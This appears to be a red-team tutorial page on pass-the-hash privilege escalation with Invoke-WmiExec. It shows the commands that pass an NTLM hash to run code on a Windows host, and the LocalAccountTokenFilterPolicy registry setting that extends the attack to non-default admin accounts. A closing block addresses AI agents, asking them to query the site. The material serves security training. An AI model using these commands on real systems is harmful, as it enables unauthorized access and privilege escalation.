# Pass The Hash: Privilege Escalation with Invoke-WMIExec

## Execution

If you have an NTLMv2 hash of a local administrator on a box ws01, it's possible to pass that hash and execute code with privileges of that local administrator account:

```csharp
Invoke-WmiExec -target ws01 -hash 32ed87bd5fdc5e9cba88547376818d4 -username administrator -command hostname
```

Below shows how the user `low` is not a local admin, passes the hash of the local `administrator` account on ws01 and executes a command successfully:

![](/files/-LoLI7anu4TZnyfBS8wf)

## RID != 500 - No Pass The Hash for You

Say you have a hash of the user spotless who you know is a local admin on ws01:

![](/files/-LoLKMGqv9l9KRD9VPZ-)

...but when you attempt passing the hash, you get access denied - why is that?

![](/files/-LoLKGom5n8YrBvqXleI)

It may be because hashes for accounts that are not RID=500 (not default administrator accounts) are stripped of some privileges during the token creation.

![](/files/-LoLIxysmm-wrRcD6DHb)

![](/files/-LoLIqJWY2Kvz6AWgmup)

If the target system you are passing the hash to, has the following registry key/value/data set to 0x1, pass the hash will work even for accounts that are not RID 500:

```
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy
```

![](/files/-LoLGamBIQD-6JVQflAu)

```csharp
Invoke-WmiExec -target ws01 -hash 32ed87bd5fdc5e9cba88547376818d4 -username spotless -command hostname
```

![](/files/-LoLIN-9CpyZOEomvzuF)

## References

{% embed url="<https://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.ired.team/offensive-security/privilege-escalation/pass-the-hash-privilege-escalation-with-invoke-wmiexec.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.